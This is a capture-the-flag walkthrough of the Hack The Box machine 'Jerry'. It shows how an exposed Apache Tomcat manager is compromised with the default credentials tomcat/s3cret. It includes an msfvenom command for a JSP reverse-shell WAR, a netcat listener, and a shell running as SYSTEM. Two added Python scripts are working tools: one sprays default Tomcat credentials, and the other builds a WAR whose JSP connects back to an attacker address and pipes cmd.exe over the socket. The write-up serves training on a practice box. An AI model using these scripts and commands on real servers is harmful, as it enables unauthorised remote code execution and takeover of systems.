
hack the box walkthrough – Jerry machine
First Windows HTB machine for my blog today: Jerry, probably the easiest one on the platform.

Let's jump in!
Enumeration
As usual, we start the enumeration phase with an nmap scan of the given IP address:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.3 Full
Running a Full scan on 10.129.79.3
Host is likely running Windows
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:27 EST
Initiating Parallel DNS resolution of 1 host. at 10:27
Completed Parallel DNS resolution of 1 host. at 10:27, 0.03s elapsed
Initiating Connect Scan at 10:27
Scanning 10.129.79.3 [65535 ports]
Discovered open port 8080/tcp on 10.129.79.3
Completed Connect Scan at 10:31, 262.72s elapsed (65535 total ports)
Nmap scan report for 10.129.79.3
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
8080/tcp open http-proxy
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.79 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:31 EST
Nmap scan report for 10.129.79.3
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds
As you can see, I am getting used to nmapAutomator. It is very convenient and fast.
The scan tells us two things: the host is a Windows machine (the "likely running Windows" line is nmapAutomator's guess from the ICMP TTL, and the Windows banner we get on the shell later confirms it), and the only open TCP port is 8080, serving Apache Tomcat 7.0.88. With nothing else exposed, the Tomcat instance, and in particular its manager application, is the whole attack surface.

Tomcat Access
A few login attempts on the Tomcat Web Application Manager (/manager/html, protected by HTTP Basic authentication) gave me access with the login/password combination tomcat/s3cret. That pair is not a random guess: it is the example account from Tomcat's own documentation, and the manager's default 401 page reproduces the sample tomcat-users.xml that contains it, so it belongs at the top of any default-credential list for Tomcat.
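The default-credential check above can be scripted. The following Python script is an added example, not code from the original walkthrough: it sends one HTTP Basic request per credential pair to /manager/html and reads the status code. The credential list is a constructed sample of pairs that show up in shipped Tomcat configs and docs, and the target URL defaults to the box's address from the scan; both are my assumptions. One caveat a practitioner should know: Tomcat's default server.xml wraps the user database in a LockOutRealm (5 failures lock a user for 300 seconds), so keep the list short and spread guesses across usernames instead of hammering one account.

```python
"""
Added example (not part of the original walkthrough): try a short list of
well-known default Tomcat Manager credentials over HTTP Basic auth and
interpret the manager's response codes.

Assumptions (mine, not the page's): the manager lives at /manager/html and
the credential list below is a constructed sample.
"""
import base64
import sys
import urllib.error
import urllib.request

# Constructed list of commonly seen default pairs. tomcat/s3cret is the
# example account from Tomcat's own manager documentation.
DEFAULT_CREDS = [
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", "admin"),
    ("admin", "tomcat"),
    ("tomcat", ""),
    ("role1", "tomcat"),
    ("both", "tomcat"),
]


def basic_auth_header(user: str, password: str) -> str:
    """Build the HTTP Basic Authorization header value (RFC 7617)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def classify(status: int) -> str:
    """Map a manager response code to what it means for the guess.

    Tomcat answers 401 when the credentials are wrong and 403 when they are
    right but the user lacks the manager-gui role, so 403 is still a find.
    """
    if status == 200:
        return "valid"
    if status == 401:
        return "rejected"
    if status == 403:
        return "authenticated, missing manager-gui role"
    return "unexpected"


def try_login(base_url: str, user: str, password: str, timeout: float = 5.0) -> int:
    """Send one authenticated GET to /manager/html and return the status code."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/manager/html",
        headers={"Authorization": basic_auth_header(user, password)},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def spray(base_url: str, creds=DEFAULT_CREDS):
    """Try each pair once and stop at the first success.

    Tomcat's default LockOutRealm locks a user after 5 failures for 300 s,
    which is why the list is short and alternates usernames.
    """
    for user, pw in creds:
        status = try_login(base_url, user, pw)
        verdict = classify(status)
        print(f"{user}:{pw or '<empty>'} -> {status} ({verdict})")
        if verdict == "valid":
            return user, pw
    return None


if __name__ == "__main__":
    # Assumed target: the box's address from the nmap output above.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.129.79.3:8080"
    print(spray(target))
```

Run it as `python3 tomcat_creds.py http://10.129.79.3:8080`; a 200 means the manager page is yours, a 403 means the password is right but that account cannot reach the manager, which is still worth noting for other services reusing the same password.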

PRIVILEGE ESCALATION
Since the manager lets me deploy new applications, I am going to get a reverse shell by deploying a malicious WAR file. msfvenom builds one that wraps a JSP reverse shell:
[email protected]:~/Documents$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.64 LPORT=4242 -f war -o revshell.war
WARN: Unresolved or ambiguous specs during Gem::Specification.reset:
reline (>= 0)
Available/installed versions of this gem:
- 0.1.5
- 0.1.3
WARN: Clearing out unresolved specs. Try 'gem cleanup '
Please report a bug if this causes problems.
Payload size: 1089 bytes
Final size of war file: 1089 bytes
Saved as: revshell.war
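To see what msfvenom actually produced, here is an added example (not from the original walkthrough) that builds the same kind of WAR by hand with Python's zipfile module: a JSP that connects back to the listener and pipes cmd.exe over the socket, plus a WEB-INF/web.xml whose welcome-file entry makes a request to the context root run the JSP. The attacker address, port and output name are parameters; the defaults (10.10.14.64, 4242, revshell.war) are taken from the walkthrough, and the JSP name index.jsp is my choice.

```python
"""
Added example (not part of the original walkthrough): hand-build a
reverse-shell WAR equivalent to the msfvenom java/jsp_shell_reverse_tcp
output, so the two pieces that matter are visible:
  - a JSP that spawns cmd.exe and wires it to a TCP socket
  - WEB-INF/web.xml whose <welcome-file> runs that JSP on GET /revshell/

Assumptions (mine): LHOST/LPORT default to the walkthrough's values and
the JSP is named index.jsp.
"""
import io
import sys
import zipfile

JSP_TEMPLATE = r'''<%@ page import="java.io.*,java.net.*" %>
<%
    // Connect back to the listener and wire cmd.exe's stdin/stdout to the socket.
    Socket s = new Socket("__LHOST__", __LPORT__);
    Process p = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
    InputStream pi = p.getInputStream(), si = s.getInputStream();
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    // Pump bytes both ways until cmd.exe exits (e.g. the operator types "exit").
    while (!s.isClosed()) {
        while (pi.available() > 0) so.write(pi.read());
        while (si.available() > 0) po.write(si.read());
        so.flush();
        po.flush();
        try { Thread.sleep(50); } catch (InterruptedException e) {}
        try { p.exitValue(); break; } catch (IllegalThreadStateException e) {}
    }
    p.destroy();
    s.close();
%>
'''

WEB_XML_TEMPLATE = '''<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <!-- Tomcat serves the welcome file for a request to the context root,
       so browsing to /revshell/ is enough to compile and run the JSP. -->
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
'''


def build_war(lhost: str, lport: int, jsp_name: str = "index.jsp") -> bytes:
    """Return the WAR (a plain zip archive) as bytes."""
    jsp = JSP_TEMPLATE.replace("__LHOST__", lhost).replace("__LPORT__", str(lport))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML_TEMPLATE.format(jsp=jsp_name))
        z.writestr(jsp_name, jsp)
    return buf.getvalue()


def list_entries(war: bytes) -> list:
    """Sorted entry names inside the archive (what a deploy will unpack)."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return sorted(z.namelist())


def read_entry(war: bytes, name: str) -> str:
    """Return one archive member as text, e.g. to inspect the generated JSP."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return z.read(name).decode()


if __name__ == "__main__":
    lhost = sys.argv[1] if len(sys.argv) > 1 else "10.10.14.64"
    lport = int(sys.argv[2]) if len(sys.argv) > 2 else 4242
    out = sys.argv[3] if len(sys.argv) > 3 else "revshell.war"
    data = build_war(lhost, lport)
    with open(out, "wb") as f:
        f.write(data)
    print(f"wrote {out} ({len(data)} bytes): {list_entries(data)}")
```

Usage is `python3 make_war.py 10.10.14.64 4242 revshell.war`, then upload the file through the manager exactly as below. From the defensive side this is also the artifact to look for: a freshly deployed WAR under webapps/ whose only content is a JSP calling ProcessBuilder or Runtime.exec, and a corresponding deploy entry in the manager and catalina logs.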
I just need to deploy it from the Tomcat Web Application Manager:

Then it shows up in the application list:

I ran my listener:
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
Then I triggered the payload by browsing to http://IP:8080/revshell/ (the WAR's web.xml lists the JSP as the welcome file, so requesting the context root is enough to compile and run it).
The shell came back already running as NT AUTHORITY\SYSTEM, so there is no privilege escalation step on this box: the Tomcat service itself runs as SYSTEM. The version string 6.3.9600 corresponds to Windows Server 2012 R2.
[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.79.3] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system